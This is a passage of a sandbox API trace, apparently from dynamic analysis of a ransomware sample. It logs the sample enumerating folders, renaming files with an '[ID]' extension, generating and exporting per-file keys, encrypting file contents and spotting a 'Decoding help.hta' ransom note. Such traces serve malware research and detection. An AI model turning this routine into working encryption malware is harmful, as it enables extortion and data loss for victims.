lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0043.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0043.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0043.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Microsoft.Synchronization.Data.SqlServerCe.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" [0043.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" [0043.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0043.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.sqlserverce.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0043.070] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0043.070] CryptAcquireContextA (in: phProv=0xe58fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe58fcec*=0x3448be8) returned 1 [0043.071] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0xe58fce8 | out: phKey=0xe58fce8*=0x6718b0) returned 1 [0043.071] CryptExportKey (in: hKey=0x6718b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe58fbe4, pdwDataLen=0xe58fce4 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fce4*=0x2c) returned 1 [0043.071] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17440) returned 0x8b90000 [0044.057] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x100) returned 1 [0046.547] CryptEncrypt (in: hKey=0x6718b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000, pdwDataLen=0xe58fce4*=0x17440, dwBufLen=0x17440 | out: pbData=0x8b90000*, pdwDataLen=0xe58fce4*=0x17440) returned 1 [0046.629] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0046.631] CloseHandle (hObject=0x69c) returned 1 [0046.631] CryptDestroyKey (hKey=0x6718b0) returned 1 [0046.631] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0046.632] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.632] WriteFile (in: hFile=0x700, lpBuffer=0xe58fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe58fbe4*, lpNumberOfBytesWritten=0xe58fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.632] WriteFile (in: hFile=0x700, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe58fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.633] CloseHandle (hObject=0x700) returned 1 [0046.634] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.SqlServerCe.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.634] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74481500, ftCreationTime.dwHighDateTime=0x1c8d683, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74481500, ftLastWriteTime.dwHighDateTime=0x1c8d683, nFileSizeHigh=0x0, nFileSizeLow=0x17450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.SqlServerCe.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0046.634] FindClose (in: hFindFile=0x6716f0 | out: hFindFile=0x6716f0) returned 1 Thread: id = 341 os_tid = 0x7a8 [0042.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*", lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716f0 [0042.931] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.931] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.931] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.931] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.931] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.931] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.931] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.932] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" [0042.932] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned 81 [0042.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0042.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" [0042.932] GlobalMemoryStatus (in: lpBuffer=0xe68fd10 | out: lpBuffer=0xe68fd10) [0042.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97923d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6a4 [0042.956] CloseHandle (hObject=0x6a4) returned 1 [0042.956] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.956] FindClose (in: hFindFile=0x6716f0 | out: hFindFile=0x6716f0) returned 1 Thread: id = 342 os_tid = 0x734 [0042.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*", lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0042.953] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.953] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.953] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.953] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.953] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.953] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.954] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.954] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.954] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" [0042.954] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned 81 [0042.954] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0042.954] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" [0042.954] GlobalMemoryStatus (in: lpBuffer=0xe78fd10 | out: lpBuffer=0xe78fd10) [0042.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e46f60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0042.971] CloseHandle (hObject=0x708) returned 1 [0042.971] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.971] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 343 os_tid = 0x7d4 [0042.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0042.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.969] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.969] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.969] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.969] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.969] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.969] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.969] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.969] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" [0042.969] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned 90 [0042.969] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0042.969] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" [0042.969] GlobalMemoryStatus (in: lpBuffer=0xe88fd10 | out: lpBuffer=0xe88fd10) [0042.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98426b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0043.007] CloseHandle (hObject=0x718) returned 1 [0043.007] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0043.007] FindClose (in: hFindFile=0x671b70 | out: hFindFile=0x671b70) returned 1 Thread: id = 344 os_tid = 0x7a4 [0042.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x22bf8b50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22bf8b50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718b0 [0042.983] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.983] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x22bf8b50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22bf8b50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.983] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.983] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.983] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22520c10, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22520c10, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x225df2f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0042.984] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.984] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 79 [0042.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" [0042.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta")) returned 0x1 [0042.984] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0042.984] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xecd314a0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x22bf8b50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x88e, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0042.984] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.984] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned 79 [0042.984] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" [0042.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\decoding help.hta")) returned 0x1 [0042.984] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0042.984] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0042.984] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0042.984] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xe9cfd30 | out: lpFindFileData=0xe9cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x86.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VCREDI~1._ID")) returned 1 [0042.984] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*" [0042.984] lstrlenW 